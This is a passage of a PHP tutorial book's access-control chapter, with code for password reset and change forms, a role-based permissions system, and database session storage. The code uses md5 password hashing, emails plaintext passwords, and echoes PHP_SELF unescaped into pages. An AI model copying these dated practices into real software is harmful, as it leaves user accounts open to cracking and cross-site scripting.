  • 350. 326 The PHP Anthology newpass.php (excerpt) $reg_messages = array( 'email_sent' => array( 'title' => 'Check your email', 'content' => '<p>Thank you. An email has been sent to:</p>' ), 'email_error' => array( 'title' => 'Email Problem', 'content' => '<p>Unable to send your details.<br />' . 'Please contact the site administrators.</p>' ), 'no_account' => array( 'title' => 'Account Problem', 'content' => '<p>We could not find your account.<br />' . 'Please contact the site administrators.</p>' ), 'reset_error' => array( 'title' => 'Password Reset Problem', 'content' => '<p>There was an error resetting your' . ' password.<br />Please contact the site administrators.' . '</p>' ) ); $yourEmail = 'you@yourdomain.com'; $subject = 'Your password'; $msg = 'Here are your login details. Please change your password.'; The $reg_messages variable contains an array of page titles and messages that will be used in the web page at various stages of the registration process. $yourEmail, $subject, and $msg are used in the creation of the email notification. Next, we build our form with PEAR::HTML_Quickform: newpass.php (excerpt) try { // Instantiate the QuickForm class $form = new HTML_QuickForm('passwordForm', 'POST'); // Add a header to the form $form->addElement('header', 'MyHeader', 'Forgotten Your Password?');
  • 351. Access Control 327 // Add a field for the email address $form->addElement('text', 'email', 'Enter your email address'); $form->addRule('email', 'Enter your email', 'required', FALSE, 'client'); $form->addRule('email', 'Enter a valid email address', 'email', FALSE, 'client'); // Add a field for the login $form->addElement('text', 'login', 'Enter your login name'); $form->addRule('login', 'Enter your login', 'required', FALSE, 'client'); // Add a submit button called submit with label "Send" $form->addElement('submit', 'submit', 'Get Password'); Notice also that we’re opening a try block: we want to catch any exceptions that may be thrown from the execution of the rest of the code. This precaution will allow us to display an appropriate message on the web page instead of a PHP error. If the form has been submitted, we can begin the password changing process: newpass.php (excerpt) if ($form->validate()) { $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $aMaint = new AccountMaintenance($db); $rawWords = file('words.txt'); $word = array_map('trim', $rawWords); $aMaint->addWords($word); We instantiate the PDO and AccountMaintenance classes and load our words file (I also trimmed off any whitespace that may appear before or after each word—just in case) so we can pass it to the addWords method. Next, we call the resetPassword method, passing the login and email values from the form as arguments:
  • 352. 328 The PHP Anthology newpass.php (excerpt) $details = $aMaint->resetPassword( $form->getSubmitValue('login'), $form->getSubmitValue('email')); If all goes well, an email is sent via PEAR::Mail_Mime to inform the user of the new password: newpass.php (excerpt) $crlf = "n"; $text = $msg . "nnLogin: " . $details[0]['login'] . "nPassword: " . $details[0]['password']; $hdrs = array( 'From' => $yourEmail, 'Subject' => $subject ); $mime = new Mail_mime($crlf); $mime->setTXTBody($text); $body = $mime->get(); $hdrs = $mime->headers($hdrs); $mail = Mail::factory('mail'); // Send the message $succ = $mail->send($form->getSubmitValue('email'), $hdrs, $body); if (PEAR::isError($succ)) { $display = $reg_messages['email_error']; } else { $display = $reg_messages['email_sent']; $display['content'] .= '<p>' . $form->getSubmitValue('email') . '</p>'; } } The page $display variable is set to a helpful message when the email is sent suc­ cessfully; if it’s not, the $display variable displays an error message.
  • 353. Access Control 329 If the form hasn’t yet been submitted, we just display the form HTML: newpass.php (excerpt) else { $display = array( 'title' => 'Reset Password', 'content' => $form->toHtml() ); } } Finally, we catch any exceptions that may have occurred and display an appropriate message: newpass.php (excerpt) catch (AccountUnknownException $e) { $display = $reg_messages['no_account']; } catch (Exception $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $display = $reg_messages['reset_error']; } ?> The HTML of the Reset Password page looks like this: newpass.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML Head contents… </head> <body>
  • 354. 330 The PHP Anthology <h1><?php echo $display['title']; ?></h1> <?php echo $display['content']; ?> </body> </html> Figure 10.4 shows the page’s display. Figure 10.4. The Reset Password page You can add a link to the bottom of your login form so that the user is able to access the Reset Password page. Here’s an example: <a href="newpass.php">Forgotten your password?</a> How do I let users change their passwords? A good design test for many PHP applications is whether users can change their passwords without needing to log back into the application afterwards. Provided you construct your application carefully, your users should be able to go about their business without further ado after changing their passwords. It’s important to be considerate to your site’s users if you want them to stick around!
  • 355. Access Control 331 Solution If we return for a minute to the session-based authentication mechanism we dis­ cussed earlier in this chapter, you’ll remember that the login and md5 encrypted password are stored in session variables and rechecked on every new page by the Auth class. The trick is to change the value of the password in both the session variable and the database when users change their passwords. We can perform this trick with a small modification to the AccountMaintenance class—found in “How do I deal with members who forget their passwords?”—and the addition of a new form. Modifying AccountMaintenance With a little tweaking of the AccountMaintenance class to add a method for changing passwords, we should be able to handle the job fairly easily. The changePassword method requires an instance of the Auth class (found in “How do I create a class to control access to a section of the site?”), the old password, and the new password as arguments: AccountMaintenance.class.php (excerpt) public function changePassword($auth, $oldPassword, $newPassword) { $var_login = $this->cfg['login_vars']['login']; $user_table = $this->cfg['users_table']['table']; $user_login = $this->cfg['users_table']['col_login']; $user_pass = $this->cfg['users_table']['col_password']; At the beginning of the method, we store some of the configuration settings in local variables to help the readability of the rest of the method. The method then instantiates a new Session object (which we saw in “How do I create a session class?”) and attempts to find the user record in the database: AccountMaintenance.class.php (excerpt) $session = new Session(); try { $sql = "SELECT * FROM " . $user_table . "
  • 356. 332 The PHP Anthology WHERE " . $user_login . " = :login AND " . $user_pass . " = :pass"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login', $session->get($var_login)); $stmt->bindParam(':pass', md5($oldPassword)); $stmt->execute(); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); } catch (PDOException $e) { throw new AccountDatabaseException('Database error when' . ' finding user: '.$e->getMessage()); } The method first performs a database lookup to find the record of the user who’s using the current login details—obtained from the session information—and the old password. If a PDOException is thrown, the method throws one of our custom exceptions, AccountDatabaseException. The results of the database lookup are checked—if anything but a single matching record is returned, the method will thrown an AccountUnknownException: AccountMaintenance.class.php (excerpt) if (count($result) != 1) { throw new AccountUnknownException('Could not find account'); } Finally, if no exceptions have been thrown, the method updates the password in­ formation in the database with the new password: AccountMaintenance.class.php (excerpt) try { $sql = "UPDATE " . $user_table . " SET " . $user_pass . " = :pass
  • 357. Access Control 333 WHERE " . $user_login . " = :login"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login', $session->get($var_login)); $stmt->bindParam(':pass', md5($newPassword)); $stmt->execute(); $auth->storeAuth($session->get($var_login), $newPassword); } catch (PDOException $e) { throw new AccountDatabaseException('Database error when' . ' updating password: '.$e->getMessage()); } } After we update the information in the user table, the current session information is also updated via the Auth->storeAuth method. Again, if the operation throws a PDOException, we throw an AccountDatabaseException. It’s a good idea to ask the user to enter the old password before changing it over and giving them access with a new one. Perhaps the user logged in at an Internet café and then left, forgetting to log out, or worse, his or her session was hijacked elec­ tronically. The process of ascertaining that the user can provide the old password can preclude some of the potential for damage, as it prevents anyone who “takes over” the session from being able to change the password and thus assume total control. Instead, the newcomer’s only logged in as long as the session continues. (You may also wish to ask a user to reenter the password before completing any major actions—like making a credit card purchase—for this very reason.) The Change Password Form This web page form will show you how the changePassword method can easily be used in your registration system. We start by including all the classes and other files we’ll need: changepass.php (excerpt) <?php error_reporting(E_ALL); require_once 'Session.class.php';
  • 358. 334 The PHP Anthology require_once 'Auth.class.php'; require_once 'AccountMaintenance.class.php'; require_once 'HTML/QuickForm.php'; require_once 'dbcred.php'; We set the error reporting level to E_ALL with the error_reporting function, as we’re using PEAR packages, which will cause E_Strict errors under PHP 5. We then include our custom classes for session, authorization, and account management, the PEAR::HTML_QuickForm package, and our database credentials file. Next, we set the $reg_messages array to hold the page content for the different form outcomes: changepass.php (excerpt) $reg_messages = array( 'success' => array( 'title' => 'Password Changed', 'content' => '<p>Your password has been changed' . ' successfully.</p>' ), 'no_account' => array( 'title' => 'Account Problem', 'content' => '<p>We could not find your account.<br />' . 'Please contact the site administrators.</p>' ), 'change_error' => array( 'title' => 'Change Password Problem', 'content' => '<p>There was an error changing your' . ' password. Please contact the site administrators,' . ' or click ' . '<a href="' . $_SERVER['PHP_SELF'] . '">here</a> to' . ' try again.</p>' ) ); We then test to find out whether the user is currently authorized to see the Change Password form, with the assistance of the Auth class:
  • 359. Access Control 335 changepass.php (excerpt) try { $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $auth = new Auth($db, 'login.php', 'secret'); At this point, we open a try block; we want to catch any exceptions that may be thrown from the execution of the rest of the code. Catching any exceptions from this point will allow us to display an appropriate message on the web page instead of a PHP error. We instantiate the PDO and Auth classes; if the user isn’t authorized, he or she will be redirected to the login form. And if all’s well, we start building the Change Password form with PEAR::HTML_QuickForm: changepass.php (excerpt) $form = new HTML_QuickForm('changePass', 'POST'); function cmpPass($element, $confirm) { $password = $GLOBALS['form']->getElementValue('newPassword'); return $password == $confirm; } $form->registerRule('compare', 'function', 'cmpPass'); After instantiating the HTML_QuickForm object, we define and register the function cmpPass that will be used to validate the password fields, to ensure that the password and password confirmation fields match. Then we add the form: changepass.php (excerpt) $form->addElement('header', 'MyHeader', 'Change your password'); // Add a field for the old password $form->addElement('password', 'oldPassword',
  • 360. 336 The PHP Anthology 'Current Password'); $form->addRule('oldPassword', 'Enter your current password', 'required', false, 'client'); // Add a field for the new password $form->addElement('password', 'newPassword', 'New Password'); $form->addRule('newPassword', 'Please provide a password', 'required', false, 'client'); $form->addRule('newPassword', 'Password must be at least 6 characters', 'minlength', 6, 'client'); $form->addRule('newPassword', 'Password cannot be more than 12 chars', 'maxlength', 50, 'client'); $form->addRule('newPassword', 'Password can only contain letters and ' . 'numbers', 'alphanumeric', NULL, 'client'); // Add a field for password confirmation $form->addElement('password', 'confirm', 'Confirm Password'); $form->addRule('confirm', 'Please confirm your password', 'required', false, 'client'); $form->addRule('confirm', 'Your passwords do not match', 'compare', false, 'client'); // Add a submit button $form->addElement('submit', 'submit', 'Change Password'); If the form has been submitted, we can attempt to change the password: changepass.php (excerpt) if ($form->validate()) { $aMaint = new AccountMaintenance($db); $aMaint->changePassword($auth, $form->getSubmitValue('oldPassword'), $form->getSubmitValue('newPassword') ); $display = $reg_messages['success']; }
  • 361. Access Control 337 On validation of the form, we instantiate an AccountMaintenance object and call the changePassword method. If no exceptions are thrown, we set the $display variable to the success message. If the form has not yet been submitted and validated, we display the form contents: changepass.php (excerpt) else { // If not submitted, display the form $display = array( 'title' => 'Change Password', 'content' => $form->toHtml() ); } } The final task of our main script is to catch any possible exceptions and display appropriate page content: changepass.php (excerpt) catch (AccountUnknownException $e) { $display = $reg_messages['no_account']; } catch (Exception $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $display = $reg_messages['change_error']; } ?> The HTML content of the Change Password page is as follows:
  • 362. 338 The PHP Anthology changepass.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML Head contents… </head> <body> <h1><?php echo $display['title']; ?></h1> <?php echo $display['content']; ?> </body> </html> Finally, the new Change Password page can be seen in Figure 10.5. Figure 10.5. The new Change Password page Discussion Now that you know how to allow users to change their passwords, it should be no problem for you to change other account settings, such as the first and last names and the signature—simply add the details to the AccountMaintenance class. If you want to allow users to change their email addresses, you’ll need to examine the re­ gistration procedure used earlier in “How do I build a registration system?”, and modify the SignUp class. You should make sure that users confirm a new email address before you allow them to change it.
  • 363. Access Control 339 How to do I build a permissions system? In the previous sections, we built an authentication system that provided global security for your web site. But, consider this: are all the members of your site equal? You probably don’t want all of your users to have access to edit and delete articles, for example. To deal with this issue, you need to add to the security system further functionality that allows you to assign permissions to groups of members, permitting only these users to perform specific actions. Rather than assign permissions to single accounts, which would quickly become a nightmare to administer, we’ll build a permissions system in terms of users, groups, and permissions. Users (login accounts) will be assigned to groups, which will have names like Administrators, Authors, Managers, and so on. Permissions reflect actions that users will be allowed to perform within the site, and they will also be assigned to groups. >From an administration perspective, this system will be easy to manage, as it’ll be a simple matter to see which Permissions a particular group has, and which users are assigned to that group. This kind of access control is known as role-based access control. If you’d like to read more on the theory of role-based access control, the web site of the US Govern­ ment National Institute of Standards and Technology has a complete section on it.11 Solution Let’s leap in and build our permission system. Setting Up the Database Building the permissions system initially requires the construction of many-to-many relationships between database tables. This is explained as follows: ■ A user can belong to many groups. ■ A group may have many users. ■ A permission can be assigned to many groups. ■ A group may have many permissions. 11 http://csrc.nist.gov/rbac/
  • 364. 340 The PHP Anthology In practical terms, the way to build many-to-many relationships in MySQL is to use a bridge table, which relates to two other tables. The bridge table stores a two-column index, each column being the key of one of the two related tables. For example, we have a user table and a collection table in our database. Here’s the SQL for those tables: access_control.sql (excerpt) CREATE TABLE user ( user_id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, firstName VARCHAR(50) DEFAULT NULL, lastName VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, PRIMARY KEY (user_id), UNIQUE KEY user_login (login) ); CREATE TABLE collection ( collection_id INT(11) NOT NULL auto_increment, name VARCHAR(50) NOT NULL default '', description TEXT NOT NULL, PRIMARY KEY (collection_id) ); Each user has a unique ID and login name, and several other pieces of information associated with his or her record. Each group has a unique ID, a name, and a descrip­ tion. We’ll use a bridge table to link users to their groups, and groups to their users. Here’s the definition of the user2collection lookup table: access_control.sql (excerpt) CREATE TABLE user2collection ( user_id INT(11) NOT NULL default '0', collection_id INT(11) NOT NULL default '0', PRIMARY KEY (user_id, collection_id) );
  • 365. Access Control 341 Notice that the primary key for the table uses both columns: this ensures that no combination of user_id and collection_id can appear more than once. Be Aware of Reserved Words I use “collection” to refer to “group” in MySQL. “Group” is a reserved word in SQL, so it shouldn’t be used as a table name. Technically, it can be used with the proper quoting, but why run the risk of confusing ourselves—and possibly MySQL? You can find more about SQL reserved words at the MySQL web site.12 Here’s some hypothetical data that shows how the bridge table can be used: mysql> select * from user2collection; +---------+---------------+ | user_id | collection_id | +---------+---------------+ | 1 | 1 | | 2 | 1 | | 2 | 2 | | 3 | 1 | | 4 | 1 | +---------+---------------+ 5 rows in set (0.00 sec) This data tells us that user 1 is a member of group 1, user 2 is a member of groups 1 and 2, user 3 is a member of group 1, and so on. We’ll also need a permission table for the purpose of keeping track of permissions: access_control.sql (excerpt) CREATE TABLE permission ( permission_id INT(11) NOT NULL AUTO_INCREMENT, name VARCHAR(50) NOT NULL DEFAULT '', description TEXT NOT NULL, PRIMARY KEY (permission_id) ); 12 http://dev.mysql.com/doc/refman/4.1/en/reserved-words.html
  • 366. 342 The PHP Anthology Each permission has a unique ID, a name, and a description. Permission names will represent actions; view, create, edit and delete, for example. We’ll need a bridge table to link groups to permissions—here’s the collection2permission table: access_control.sql (excerpt) CREATE TABLE collection2permission ( collection_id INT(11) NOT NULL DEFAULT '0', permission_id INT(11) NOT NULL DEFAULT '0', PRIMARY KEY (collection_id, permission_id) ); With the lookup tables defined, we can now perform queries across the tables to identify the permissions a particular user has been allowed. For example, the fol­ lowing query returns all the permission names for the user with user_id 1: SELECT p.name as permission FROM user2collection uc, INNER JOIN collection2permission cp ON uc.collection_id = cp.collection_id INNER JOIN permission p ON cp.collection_id = p.collection_id WHERE uc.user_id = 1; Note that I’ve used aliases for table names, such as user2collection uc, to make writing the query easier. If you’ve downloaded and installed the sample access_control database mentioned in the introduction to this chapter, you’ll find it contains three sample user accounts with the details shown in Table 10.1. Table 10.1. Sample User Accounts Login Password Group jackblack password Users jackwhite password Editors siteadmin password Administrators
  • 367. Access Control 343 The access_control database also contains three sample groups, as shown in Table 10.2. Table 10.2. Sample Groups Group Permissions Users view Editors view, create, edit Administrators view, create, edit, delete The User Class The User class will encapsulate all the functionality for checking a user’s permis­ sions. Our class uses the following configuration settings: access_control.ini (excerpt) ; Access Control Settings ;web form variables e.g. $_POST['login'] [login_vars] login=login ;user login table details [users_table] table=user col_id=user_id col_login=login col_password=password col_email=email col_name_first=firstName col_name_last=lastName col_signature=signature ;Permission table details [permission_table] table=signup col_id=permission_id col_name=name ;Collection table details [collection_table] table=collection
  • 368. 344 The PHP Anthology col_id=collection_id col_name=name ;User to Collection lookup table details [user_to_collection_table] table=user2collection col_id=user_id col_collection_id=collection_id ;Collection to Permission lookup table details [collection_to_permission_table] table=collection2permission col_id=collection_id col_permission_id=permission_id We define some custom exception classes to provide a consistent level of error handling: User.class.php (excerpt) class UserException extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); error_log('Error in '.$this->getFile(). ' Line: '.$this->getLine(). ' Error: '.$this->getMessage() ); } } class UserDatabaseException extends UserException {} Our base class, UserException, is a custom exception that ensures the exception details are logged using the error_log function. The subclass UserDatabaseException represents a database problem. If you were to add further functionality to the User class, you could create further custom exceptions based on the UserException class to cover all possible exception situations. We begin to create the class by defining some class properties:
  • 369. Access Control 345 User.class.php (excerpt) class User { private $db; protected $cfg; private $userId; private $firstName; private $lastName; private $email; $db will contain a PDO instance for our database connection, $cfg will store our configuration details, and the remaining properties will contain information from the user’s account details. The constructor takes an instance of the PDO class, loads the configuration file, and calls the populate method: User.class.php (excerpt) public function __construct(PDO $db) { $this->db = $db; $this->cfg = parse_ini_file('access_control.ini', TRUE); $this->populate(); } Next comes the populate method: User.class.php (excerpt) private function populate() { $var_login = $this->cfg['login_vars']['login']; $user_table = $this->cfg['users_table']['table']; $user_id = $this->cfg['users_table']['col_id']; $user_login = $this->cfg['users_table']['col_login']; $user_email = $this->cfg['users_table']['col_email']; $user_first = $this->cfg['users_table']['col_name_first']; $user_last = $this->cfg['users_table']['col_name_last'];
  • 370. 346 The PHP Anthology We load some configuration values into local variables to aid the readability of the code. Next, we attempt to look up the user’s details in the database: User.class.php (excerpt) $session = new Session(); try { $sql = "SELECT " . $user_id . ", " . $user_email . ", " . $user_first . ", " . $user_last . " FROM " . $user_table . " WHERE " . $user_login . " = :login"; $stmt = $this->db->prepare($sql); $login = $session->get($var_login); $stmt->bindParam(':login', $login); $stmt->execute(); $row = $stmt->fetch(PDO::FETCH_ASSOC); } catch(PDOException $e) { throw new UserDatabaseException('Database error when' . ' populating user details: '.$e->getMessage()); } We first need to instantiate a new session object (which we built in “How do I create a session class?”). The session login variable is then used as the key to find the user’s details in the user table. If a PDOException is thrown, we throw our custom UserDatabaseException. Once we’ve retrieved the user’s record from the database, we store all the detail in the User object properties:
  • 371. Access Control 347 User.class.php (excerpt) $this->userId = $row[$user_id]; $this->email = $row[$user_email]; $this->firstName = $row[$user_first]; $this->lastName = $row[$user_last]; } Populate pulls this user’s record from the database and stores various useful pieces of information from that record in the object’s variables so that we can access them easily; for example, when we want to display the user’s name on the page. The most important aspect is to gather the user_id value from the database, for the purpose of checking permissions. We also add a few accessor methods. Accessor methods allow public access to otherwise protected object properties—they allow the properties to be read without granting public access to users of the class to write to them: User.class.php (excerpt) public function getId() { return $this->userId; } public function getFirstName() { return $this->firstName; } public function getLastName() { return $this->lastName; } public function getEmail() { return $this->email; } Finally, we add the checkPermission method. This method takes a named permis­ sion as an argument and checks that the user has that permission:
  • 372. 348 The PHP Anthology User.class.php (excerpt) public function checkPermission($permission) { if (!isset($this->permissions)) { $perm_table = $this->cfg['permission_table']['table']; $perm_id = $this->cfg['permission_table']['col_id']; $perm_name = $this->cfg['permission_table']['col_name']; $u2c_table = $this->cfg['user_to_collection_table']['table']; $u2c_id = $this->cfg['user_to_collection_table']['col_id']; $c2p_table = $this->cfg['collection_to_permission_table'] ➥['table']; $c2p_id = $this->cfg['collection_to_permission_table'] ➥['col_id']; $c2p_pid = $this->cfg['collection_to_permission_table'] ➥['col_permission_id']; The first step we take is to check that the permissions array for this user has been set. If not, we proceed with the database lookup. Before we perform the lookup, though, we assign some configuration settings to local variables to help improve our code’s readability. Next, we assemble the SQL query and perform the lookup using the User->userId property as the key: User.class.php (excerpt) try { $this->permissions = array(); $this->permissions = array(); $sql = 'SELECT p.'. $perm_name .' as perm FROM ' . $u2c_table . ' uc INNER JOIN ' . $c2p_table . ' cp ON uc.' . $u2c_id . ' = cp.' . $c2p_id . ' INNER JOIN ' . $perm_table . ' p ON cp.' . $c2p_pid . ' = p.' . $perm_id . ' WHERE uc.user_id =:user'; $stmt = $this->db->prepare($sql); $stmt->bindParam(':user', $this->userId);
  • 373. Access Control 349 $stmt->execute(); while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) { $this->permissions[] = $row['permission']; } } catch(PDOException $e) { throw new UserDatabaseException('Database error when' . ' checking permissions: '.$e->getMessage()); } } If the lookup has returned database rows, we store them in object User->permissions property array. This means that if we need to check permissions more than once on a page, that check will only come at the cost of a single query. And, as usual, if a PDOException is thrown, we in turn throw our custom UserDatabaseException. Finally, we check that the permission passed into the method as an argument in the $permission variable is included in the user’s permissions array: User.class.php (excerpt) if (in_array($permission, $this->permissions)) { return true; } else { return false; } } } The checkPermission simply returns true if the user has the permission, and false if not. The Permissions Test Page Now, to test our permissions system, we can build a permissions testing page. This testing page will require you to log in using the details of one of the accounts in the
  • 374. 350 The PHP Anthology user table, and will simulate an attempt to access one of four defined permission levels in the permission table—view, create, edit, and delete. First, we need to include all the required classes and the database credentials file: permissions.php (excerpt) <?php require_once 'Session.class.php'; require_once 'Auth.class.php'; require_once 'User.class.php'; require_once 'dbcred.php'; Next, we instantiate our PDO, Auth (which we met in “How do I create a class to control access to a section of the site?”), and User objects: permissions.php (excerpt) try { $db = new PDO($dsn, $user, $password); $auth = new Auth($db, 'login.php', 'secret'); $authuser = new User($db); The Auth object will make sure the current user is authorized, and redirect them to the login form if not. If the user is authorized, we create a User object in order to be able to check the user’s permissions. We’re simulating permissions through a query string variable—$_GET['view']: permissions.php (excerpt) switch (@$_GET['view']) { case 'create': $permission = 'create'; $msg = 'You are able to create new content.'; break; case 'edit': $permission = 'edit'; $msg = 'You are able to edit existing content.'; break; case 'delete':
  • 375. Access Control 351 $permission = 'delete'; $msg = 'You are able to delete existing content.'; break; default: $permission = 'view'; $msg = 'You are able to read existing content.'; } We set the permission level and the $msg variable—the message that appears on the page—to reflect the value of $_GET['view']. Next, we test the user’s permissions: permissions.php (excerpt) if (!$authuser->checkPermission($permission)) { $msg = 'You do not have permission to do this.'; } If the user doesn’t have the required permission, we take appropriate action. Since this demonstration is merely a test, we simply set the page message to indicate that the user does not have the required permission level. In a production web applica­ tion, you’d redirect the user to the login form, adding a message to indicate that they’re not authorized to obtain that level of access. Finally, we make sure to catch any exceptions and take appropriate action: permissions.php (excerpt) } catch (Exception $e) { $msg = 'An error has occurred: ' . $e->getMessage(); } ?> The only task left is to create the HTML for our permissions testing page:
  • 376. 352 The PHP Anthology permissions.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML Head contents… </head> <body> <h1>Permissions Test</h1> <p> <a href="<?php echo $_SERVER['PHP_SELF']; ?>">View</a> | <a href="<?php echo $_SERVER['PHP_SELF']; ?>?view=create">Create</a> | <a href="<?php echo $_SERVER['PHP_SELF']; ?>?view=edit">Edit</a> | <a href="<?php echo $_SERVER['PHP_SELF']; ?>?view=delete">Delete</a> </p> <h2><?php echo $authuser->getFirstName() . ' ' . $authuser->getLastName(); ?></h2> <p>Permission Level: '<?php echo $permission ?>'</p> <p><?php echo $msg; ?></p> </body> </html> The testing page is very simple. First, we have a menu of links that test each permis­ sion level by appending the appropriate query string to the link URLs. Then ,we have a simple page body that consists of the current user’s name, the current per­ mission level, and the message set by the permissions test. Discussion The User class fetches data on a “need to know” basis. That is, despite the fact that some user data is retrieved on instantiation using the populate method, the data pertaining to permissions may not be needed every time the User class is instantiated. It’s likely that we’ll only check permissions on a restricted number of pages, so we can save ourselves a database query when the user views public pages, and leave the checkPermission method to be called only when needed. This approach of only fetching data from the database at the moment it is needed—as opposed to performing all the queries at the beginning—is known as lazy fetching, and can be a useful ap­ proach to reducing unnecessary queries and performance overhead.
  • 377. Access Control 353 The permissions testing page was a simple example, of course, but you could use the checkPermission method any way you like—perhaps within if statements to decide what a user is allowed to do and see. Another approach would be to use a variable, such as the $msg variable we’ve used here, to store the name of a PHP script, which contained the restricted content, for use with an include statement. Otherwise, that’s all there is to it. Now, all you need to do is build an administration interface to control Users, Groups, and Permissions. Well, what are you waiting for? How do I store sessions in a database? As discussed earlier, in “How do I use sessions?”, the default behavior of sessions in PHP on the server side is to create a temporary file in which session data is stored. This file is usually kept in the temporary directory of the operating system and, as such, presents a security risk to your applications, especially if you’re using a shared server. Solution Use the PHP function session_set_save_handler to specify a custom session handler that provides an alternative data store that’s fully under your control. The session_set_save_handler function definition is as follows: bool session_set_save_handler (callback $open, callback $close, callback $read, callback $write, callback $destroy, callback $gc ); Each callback argument is a function that must conform to the PHP session’s API. You can read more about the function on The PHP Manual page.13 You can simply implement a separate function for each callback; however, in this solution we create a new class—the DatabaseSession class—to encapsulate all our session handling needs, and use a PDO object to connect to a database and store session information there. 13 http://www.php.net/session_set_save_handler/
  • 378. 354 The PHP Anthology Before we delve deep into the details of the class, I’ll show you the create statement for the session table we use. This statement provides a minimal amount of inform­ ation for you to keep track of, so feel free to add more if you wish—for example, you might like to store the IP address or the last page visited. Just remember to add the new columns and values to the queries that are used throughout the class’s methods below: CREATE TABLE session ( sess_id VARCHAR(255), sess_start DATETIME, sess_last_acc DATETIME, sess_data VARCHAR(255), PRIMARY KEY (sess_id) ); The DatabaseSession Class Now, let’s look at the class. We begin by defining the class properties: DatabaseSession.class.php (excerpt) class DatabaseSession { private $sess_table; private $sess_db; private $sess_db_host; private $sess_db_usr; private $sess_db_pass; private $db; $sess_table will store the database table name, $sess_db will store the database name, $sess_db_host will store the database server hostname, $sess_db_usr will store the database username, and $sess_db_pass will store the database password. The $db property will store the PDO object used for all the database queries. Next, we define the constructor method:
  • 379. Access Control 355 DatabaseSession.class.php (excerpt) public function __construct($sess_db_usr = 'user', $sess_db_pass = 'passwd', $sess_table = 'session', $sess_db = 'dbname', $sess_db_host = 'locolhost') { $this->sess_db_usr = $sess_db_usr; $this->sess_db_pass = $sess_db_pass; $this->sess_table = $sess_table; $this->sess_db = $sess_db; $this->sess_db_host = $sess_db_host; } The constructor simply stores the database information passed to the method within the object’s properties. The first function callback that we must pass to the session_set_save_handler function is an open function, which is called when a session is started. The open method of the DatabaseSession class will handle that job: DatabaseSession.class.php (excerpt) public function open($path, $name) { try { $dsn = "mysql:host={$this->sess_db_host};". "dbname={$this->sess_db}"; $this->db = new PDO($dsn, $this->sess_db_usr, $this->sess_db_pass ); $this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { error_log('Error connecting to the session database.'); error_log('Reason given:'.$e->getMessage()."n"); return false; } return true; }
  • 380. 356 The PHP Anthology This method is called with two string arguments—the path of the session file and the name of the file—and must return either true or false. The path and filename information is irrelevant to us as we’re using a database, so we do nothing with it. In the method, we make the connection to the database that will hold the session data. If there’s an error, we return false; if the database connection is successful, we return true. The next function callback we need to implement is the close function, so we add a close method to our class: DatabaseSession.class.php (excerpt) public function close() { $this->db = null; return true; } The close method is called when we end a session, and must return either true or false. It isn’t uncommon to manually call the garbage collection (gc) method here, though it isn’t strictly necessary—PHP will do its own garbage collection throughout. We remove our database connection by setting the close method to null. session_set_save_handler also requires that a read function be implemented. The read function needs to take the session ID as an argument and return a string—even an empty one, if that’s appropriate. We implement a read method in our class: DatabaseSession.class.php (excerpt) public function read($sess_id) { try { $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " . "sess_id = :id"; $stmt = $this->db->prepare($sql); $stmt->execute(array(':id'=>$sess_id)); $res = $stmt->fetchAll(PDO::FETCH_ASSOC); } catch (PDOException $e)
  • 381. Access Control 357 { error_log('Error reading the session data table in the' . ' session reading method.'); error_log(' Query with error: '.$sql); error_log(' Reason given:'.$e->getMessage()."n"); return ''; } if (count($res) > 0) { return isset($res[0]['sess_data']) ? $res[0]['sess_data'] : ''; } else { return ''; } } The read method retrieves the session data from the database, using the session ID as the key, and returns the data as a string. If no data is found or there’s a database error, an empty string is returned. After the read function, the next function callback we need to implement is the write function. This function, as the name implies, handles the writing of the session data. The function is required to take two arguments—the session ID and the session data—and the return value must be either true or false. We implement a write method in our class-based solution. In our method, we first see if the session ID is already in the database: DatabaseSession.class.php (excerpt) public function write($sess_id, $data) { try { $sql = "SELECT sess_data FROM {$this->sess_table} WHERE " . "sess_id = :id"; $stmt = $this->db->prepare($sql); $stmt->execute(array(':id'=>$sess_id)); $res = $stmt->fetchAll(PDO::FETCH_ASSOC); } catch (PDOException $e)
